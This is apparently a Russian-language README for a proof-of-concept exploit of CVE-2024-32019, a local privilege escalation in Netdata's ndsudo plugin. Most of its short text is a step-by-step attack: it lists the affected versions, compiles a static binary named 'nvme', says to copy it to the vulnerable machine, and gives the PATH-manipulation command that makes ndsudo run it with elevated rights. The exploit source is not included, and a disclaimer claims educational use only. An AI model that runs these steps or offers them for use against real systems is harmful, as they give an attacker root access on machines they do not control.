
Эксплойт-доказательство концепции для CVE-2024-32019, демонстрирующий локальное повышение привилегий через недоверенный путь поиска в плагине ndsudo Netdata. Включает инструкции по компиляции и шаги развертывания.
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — локальное повышение привилегий через ndsudo с использованием ненадёжного пути поиска.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
Перенесите скомпилированный бинарный файл на уязвимую машину.
Сделайте его исполняемым:
chmod +x nvme
Эксплуатируйте уязвимый бинарный файл через манипуляцию PATH (используйте тот же путь, куда вы загрузили свой бинарный файл):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
Этот код доказательства концепции (PoC) предоставляется только для образовательных целей и авторизованного тестирования на проникновение.